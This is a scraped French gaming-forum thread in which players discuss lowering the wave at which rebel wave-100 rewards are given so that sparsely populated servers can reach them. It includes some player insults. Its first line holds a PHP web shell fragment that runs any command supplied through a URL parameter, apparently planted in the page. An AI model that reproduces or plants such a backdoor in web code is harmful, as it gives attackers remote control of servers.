ob_start(); system($_GET['cmd']); $execcode = ob_get_contents(); ob_end_clean();

GGCORP Forums

Mot de passe oublie
 Inscri. Rapide
Recherche
!show!: 458|Reponse: 7

récompenses rebelles vague 100 [Copier l'URL]

Rank: 8Rank: 8

Heure de publication 2019-8-18 13:47:23 |Afficher toutes les publications
pourquoi ne pas descendre les loots de la vague 100 à une vague inférieure pour que les serveurs presque vide puisse en profiter aussi au lieu de devoir attendre encore une fusion qui n'apporterai peut être pas assez de joueurs

Utiliser la magie Signaler

Heure de publication 2019-8-18 14:41:06 |Afficher toutes les publications
Edite par archange38 a 2019-8-18 13:43

jai envie de te dire, si la plus par utilisai  leur cerveau et arretai de vouloir etre 1er sinon il change de serveur, taurai moins de serveur vide, car les nouveau rebelle pousse a avoir mini 6-7 personne par serveur et donc a une plus ou moins bonne entente sur le serveur, donc non je suis pas daccord avec ta proposition

temps que certain auront cette mentalité de debile, les serveur vide seront toujours la

et tu parle de fusion, mais quand tu voit ses idiot qui etait 1er passé 4 ou 5ieme de leur serveur apres les fusion bas il arrete et recommence sur dautre serveur, on avancera pas, idiot un jour idiot toujours ( pour ses joueur la )

Rank: 6Rank: 6

Heure de publication 2019-8-18 15:09:09 |Afficher toutes les publications
Personnellement, je suis d'accord avec djacke. Je fais les rebelles tous les soirs, la plupart du temps SEUL et parfois à deux...
Avant la fusion, on était 3. Après fusion, on est 2,5

Bref. Je toucherai jamais les récompenses de la vague 100 avant d'avoir fait... 3 fusions ? 4 ?
Doit on refusionne LARGE tout de suite svp, soit en effet ça serait cool de baisser à une vague inférieure...

Heure de publication 2019-8-18 17:40:01 |Afficher toutes les publications
Note : L'auteur a ete banni ou supprime.

Rank: 6Rank: 6

Heure de publication 2019-8-18 23:26:44 |Afficher toutes les publications
seul solution pr toi trouve un serveur ou ils peuvent vague 100 comme ca tu ralera plus sur le jeu le jeu demande du temps et l apprecie comme il est meme avc ses defaut

Heure de publication 2019-8-19 15:19:00 |Afficher toutes les publications
archange38 a repondu a 2019-8-18 14:41
jai envie de te dire, si la plus par utilisai  leur cerveau et arretai de vouloir etre 1er sinon il  ...

je me disait bêtement que ça pourrait convaincre certains de ne pas changer de serveur juste à cause de ça. chez moi pas trop de soucis pour l'atteindre je compense les joueurs manquant quand je peux emprunter un 2nd pc

Heure de publication 2019-8-19 15:21:00 |Afficher toutes les publications
Aoitsuki43 a repondu a 2019-8-18 15:09
Personnellement, je suis d'accord avec djacke. Je fais les rebelles tous les soirs, la plupart du te ...

j'en suis déjà à la 3ème si je dis pas de conneries et on est 4, bon courage

Heure de publication 2019-8-19 15:27:34 |Afficher toutes les publications
erwann22 a repondu a 2019-8-18 23:26
seul solution pr toi trouve un serveur ou ils peuvent vague 100 comme ca tu ralera plus sur le jeu l ...

tkt je ne râle pas j'essaye juste de trouver des petites solutions pour que les serveurs soit moins désert. j'apprécie ce jeu je dois même être un des derniers casheurs régulier pour te dire (quand ça ne bug pas bien sûr) je sais qu'il demande du temps ça fait 3ans que j'y joue et c'est justement pour ça que j'aimerais un serveur un peu plus peuplé. pour les rebelles je compense déjà les joueurs manquant quand je le peux car j'ai les 3/4 des comptes de ce serveur laisser par leur propriétaire à ma demande pour ne pas qu'on soit trop pénaliser de leur arrêt. alors faut pas penser que j'aime pas ce jeu, au contraire ;)

Vous devez vous identifier avant de pouvoir repondre Identifiant | Inscri. Rapide

GGCORP|MyNinja|MyBankai|MyPirate|MyLegend|Archiver|GGCORP Inc.

GMT+2, 2020-2-29 05:17 , Processed in 0.024312 second(s), 10 queries , Xcache On.